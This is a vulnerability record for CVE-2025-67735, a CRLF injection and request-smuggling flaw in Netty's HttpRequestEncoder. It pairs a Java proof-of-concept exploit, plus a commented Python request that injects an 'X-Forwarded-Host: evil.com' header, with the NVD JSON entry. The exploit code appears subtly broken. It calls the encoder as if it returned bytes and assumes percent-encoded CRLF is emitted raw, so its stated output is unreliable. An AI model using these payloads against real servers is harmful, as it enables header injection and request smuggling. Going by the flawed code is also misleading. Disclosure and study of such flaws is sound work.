CVE-2025-67735

import io.netty.handler.codec.http.DefaultHttpRequest; import io.netty.handler.codec.http.HttpHeaders; import io.netty.handler.codec.http.HttpRequestEncoder; import io.netty.handler.codec.http.HttpVersion; import io.netty.handler.codec.http.HttpMethod; public class CRLFInjectionPOC { public static void main(String[] args) { HttpRequestEncoder encoder = new HttpRequestEncoder(); // Malicious URI with CRLF injection String maliciousUri = "/normal-path%0d%0aX-Injected-Header: malicious-value"; // Create HTTP request with malicious URI DefaultHttpRequest request = new DefaultHttpRequest( HttpVersion.HTTP_1_1, HttpMethod.GET, maliciousUri ); // Encode the request - this will produce smuggling attack byte[] encoded = encoder.encode(null, request); System.out.println("Encoded request (hex):"); for (byte b : encoded) { System.out.print(String.format("%02x ", b)); } // The encoded output will contain: // GET /normal-path\r\nX-Injected-Header: malicious-value HTTP/1.1\r\n\r\n // Legitimate request following will be treated as second request } } // Python PoC for testing: // import requests // target_url = "http://target-server.com" // malicious_path = "/api/endpoint%0d%0aX-Forwarded-Host: evil.com" // response = requests.get(target_url + malicious_path)

{"cve": {"id": "CVE-2025-67735", "sourceIdentifier": "[email protected]", "published": "2025-12-16T01:15:52.367", "lastModified": "2026-01-02T18:50:23.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.129.Final and 4.2.8.Final, the `io.netty.handler.codec.http.HttpRequestEncoder` has a CRLF injection with the request URI when constructing a request. This leads to request smuggling when `HttpRequestEncoder` is used without proper sanitization of the URI. Any application / framework using `HttpRequestEncoder` can be subject to be abused to perform request smuggling using CRLF injection. Versions 4.1.129.Final and 4.2.8.Final fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.129", "matchCriteriaId": "BF4FCC2E-6E1A-47D1-BF7F-08F39F24BEED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndExcluding": "4.2.8", "matchCriteriaId": "C04C7ED6-5377-4176-81F4-739B74AD632C"}]}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-84h7-rjj3-6jx4", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}